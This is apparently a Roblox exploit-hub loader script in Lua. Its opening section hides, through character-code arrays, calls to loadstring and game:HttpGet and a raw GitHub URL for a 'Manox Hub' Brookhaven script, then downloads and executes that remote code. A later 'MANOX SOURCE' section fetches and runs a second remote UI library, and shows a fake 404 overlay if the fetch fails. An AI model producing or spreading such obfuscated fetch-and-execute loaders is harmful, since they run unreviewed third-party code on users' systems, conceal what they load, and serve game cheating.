local function D(t)
    local s = ""
    for _,v in ipairs(t) do
        s = s .. string.char(v)
    end
    return s
end

local A = D({108,111,97,100,115,116,114,105,110,103})     
local B = D({103,97,109,101})                                
local C = D({72,116,116,112,71,101,116})                    

local U = {
    {104,116,116,112,115,58,47,47},
    {114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47},
    {69,122,74,65,71,65,77,69,83,57,52,47},
    {77,97,110,111,120,45,72,117,98,45,83,99,114,105,112,116,47},
    {114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47},
    {66,114,111,111,107,104,97,118,101,110}
}

local X = ""
for _,block in ipairs(U) do
    X = X .. D(block)
end

local E = getfenv()

local L = E[A]                 
local G = E[B]                 
local H = G[C]                 

local function Z(x,y)
    return x(y)
end

local function Y(z,q,w)
    return z(q, w)
end

local EXEC = Z(L, Y(H, G, X))
Z(EXEC)

-- =========================
-- MANOX SOURCE
-- =========================
local ManoxSource = {}

ManoxSource.RawLink = "https://raw.githubusercontent.com/tbao143/Library-ui/refs/heads/main/Redzhubui"
ManoxSource.HTTP404 = "HTTP 404: not found"
ManoxSource.RemoveTime = 5 -- segundos

-- =========================
-- SERVIÇOS
-- =========================
local Players = game:GetService("Players")
local Player = Players.LocalPlayer

-- =========================
-- GUI
-- =========================
function ManoxSource:Create404Gui(link)
    local ScreenGui = Instance.new("ScreenGui")
    ScreenGui.Name = "Http404Gui"
    ScreenGui.ResetOnSpawn = false
    ScreenGui.Parent = Player:WaitForChild("PlayerGui")

    local Frame = Instance.new("Frame")
    Frame.Size = UDim2.new(1, 0, 1, 0)
    Frame.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
    Frame.BackgroundTransparency = 0.25
    Frame.Parent = ScreenGui

    local TextLabel = Instance.new("TextLabel")
    TextLabel.Size = UDim2.new(0.9, 0, 0.3, 0)
    TextLabel.Position = UDim2.new(0.05, 0, 0.35, 0)
    TextLabel.BackgroundTransparency = 1
    TextLabel.TextColor3 = Color3.fromRGB(255, 80, 80)
    TextLabel.Font = Enum.Font.GothamBold
    TextLabel.TextScaled = true
    TextLabel.TextWrapped = true
    TextLabel.Text =
        ManoxSource.HTTP404 .. "\n\n" .. link
    TextLabel.Parent = Frame

    task.delay(ManoxSource.RemoveTime, function()
        if ScreenGui then
            ScreenGui:Destroy()
        end
    end)
end

-- =========================
-- CHECK RAW
-- =========================
function ManoxSource:CheckRaw()
    local success, result = pcall(function()
        return game:HttpGet(ManoxSource.RawLink)
    end)

    if not success or not result or result == "" then
        warn(ManoxSource.HTTP404 .. " → " .. ManoxSource.RawLink)
        ManoxSource:Create404Gui(ManoxSource.RawLink)
        return
    end

    -- RAW EXISTE
    loadstring(result)()
end

-- =========================
-- START
-- =========================
ManoxSource:CheckRaw()
